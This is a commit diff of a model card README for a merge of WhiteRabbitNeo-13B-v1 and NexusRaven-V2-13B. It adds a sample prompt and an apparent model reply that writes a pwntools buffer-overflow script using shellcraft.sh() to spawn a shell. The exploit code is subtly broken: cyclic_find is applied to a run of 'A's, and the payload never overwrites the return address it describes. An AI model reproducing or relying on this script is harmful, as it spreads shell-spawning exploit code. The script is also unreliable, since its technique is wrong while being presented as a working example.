Commit
•
23559ce
1
Parent(s):
9a6c41a
Update README.md
Browse files
README.md
CHANGED
|
@@ -3,4 +3,56 @@ license: llama2
|
|
| 3 |
base_model: codellama/CodeLlama-13b-Instruct-hf
|
| 4 |
---
|
| 5 |
|
| 6 |
-
Grafted WhiteRabbitNeo-13B-v1 and NexusRaven-V2-13B with mergekit.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 3 |
base_model: codellama/CodeLlama-13b-Instruct-hf
|
| 4 |
---
|
| 5 |
|
| 6 |
+
Grafted WhiteRabbitNeo-13B-v1 and NexusRaven-V2-13B with mergekit. Use the WhiteRabbitNeo template for regular code, and the NR template for function calling.
|
| 7 |
+
|
| 8 |
+
SYSTEM: Answer the Question by exploring multiple reasoning paths as follows:
|
| 9 |
+
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
|
| 10 |
+
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
|
| 11 |
+
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
|
| 12 |
+
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
|
| 13 |
+
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
|
| 14 |
+
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
|
| 15 |
+
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
|
| 16 |
+
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
|
| 17 |
+
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
|
| 18 |
+
|
| 19 |
+
USER: Write a pwntools scriptthat overflows a 64 character buffer from stdin.
|
| 20 |
+
ASSISTANT: To write a pwntools script that overflows a 64-character buffer from stdin, we need to follow these steps:
|
| 21 |
+
|
| 22 |
+
1. **Identify the vulnerable program**: Find the program that has a buffer overflow vulnerability. This can be done by analyzing the program's source code or by using tools like `gdb` or `valgrind`.
|
| 23 |
+
2. **Set up the environment**: Install pwntools and any other necessary dependencies.
|
| 24 |
+
3. **Create a pwntools script**: Start by importing the `pwn` module and setting up the connection to the vulnerable program.
|
| 25 |
+
4. **Find the offset**: Use the `cyclic` function from pwntools to generate a pattern that will help us find the offset.
|
| 26 |
+
5. **Overflow the buffer**: Send the generated pattern to the vulnerable program, and then send additional data to overwrite the return address on the stack.
|
| 27 |
+
6. **Control the execution flow**: Overwrite the return address with the address of a shellcode or a function that will give us a shell.
|
| 28 |
+
7. **Execute the script**: Run the script and observe the results.
|
| 29 |
+
|
| 30 |
+
Here's an example pwntools script that overflows a 64-character buffer:
|
| 31 |
+
|
| 32 |
+
```python
|
| 33 |
+
from pwn import *
|
| 34 |
+
|
| 35 |
+
# Set up the connection to the vulnerable program
|
| 36 |
+
p = process('./vulnerable_program')
|
| 37 |
+
|
| 38 |
+
# Find the offset using cyclic
|
| 39 |
+
offset = cyclic_find(b'A'*64)
|
| 40 |
+
|
| 41 |
+
# Generate shellcode
|
| 42 |
+
shellcode = asm(shellcraft.sh())
|
| 43 |
+
|
| 44 |
+
# Overflow the buffer
|
| 45 |
+
payload = b'A' * offset + shellcode
|
| 46 |
+
p.sendline(payload)
|
| 47 |
+
|
| 48 |
+
# Execute the script
|
| 49 |
+
p.interactive()
|
| 50 |
+
```
|
| 51 |
+
|
| 52 |
+
In this example, `vulnerable_program` is the name of the vulnerable program, and `shellcraft.sh()` is a function from pwntools that generates shellcode for a Linux/x86-64 system. The `cyclic_find` function is used to find the offset at which the buffer overflow occurs.
|
| 53 |
+
|
| 54 |
+
Please note that this script is a basic example and may not work in all cases. It's important to tailor the script to the specific vulnerability and environment you are working with.
|
| 55 |
+
|
| 56 |
+
|
| 57 |
+
|
| 58 |
+
|